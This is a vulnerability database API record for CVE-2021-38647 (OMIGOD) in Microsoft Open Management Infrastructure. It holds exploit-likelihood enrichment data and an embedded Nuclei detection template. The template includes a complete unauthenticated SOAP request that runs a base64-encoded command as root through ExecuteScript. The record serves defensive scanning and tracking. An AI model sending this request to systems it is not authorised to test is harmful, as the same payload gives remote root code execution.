{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-38647/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-38647/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-38647/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-38647/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-38647/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-38647"},"sightings":{"href":"/api/v1/sightings/cve-2021-38647"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99933,"kev":true,"percentile":0.9997},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-38647.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-38647\n\ninfo:\n  name: Microsoft Open Management Infrastructure - Remote Code Execution\n  author: daffainfo,xstp\n  severity: critical\n  description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges.\n  remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.\n  reference:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647\n    - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647\n    - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/\n    - https://github.com/microsoft/omi\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-38647\n    cwe-id: CWE-287\n    epss-score: 0.99933\n    epss-percentile: 0.9997\n    cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: microsoft\n    product: azure_automation_state_configuration\n  tags: cve2021,cve,rce,omi,microsoft,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wsman HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/soap+xml;charset=UTF-8\n\n        <s:Envelope\n          xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n          xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n          xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n          xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n          xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n          xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n          xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n          <s:Header>\n            <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n            <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n            <a:ReplyTo>\n              <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n            </a:ReplyTo>\n            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n            <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n            <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n            <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n            <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n            <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n            <w:OptionSet s:mustUnderstand=\"true\"/>\n            <w:SelectorSet>\n              <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n            </w:SelectorSet>\n          </s:Header>\n          <s:Body>\n            <p:ExecuteScript_INPUT\n              xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n              <p:Script>aWQ=</p:Script>\n              <p:Arguments/>\n              <p:timeout>0</p:timeout>\n              <p:b64encoded>true</p:b64encoded>\n            </p:ExecuteScript_INPUT>\n          </s:Body>\n        </s:Envelope>\n\n    matchers:\n      - type: word\n        words:\n          - '<p:StdOut>'\n          - 'uid=0(root) gid=0(root) groups=0'\n        condition: and\n# digest: 4b0a00483046022100dc3602019c05f9ec77d01c23c046d968b5271c8d1852ca8388a1df73cf0476960221009b14c3ab68d0ae0d600ffec535c1a5fec47f45bb75e2b32d955ab8eef6deb02a:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-38647"}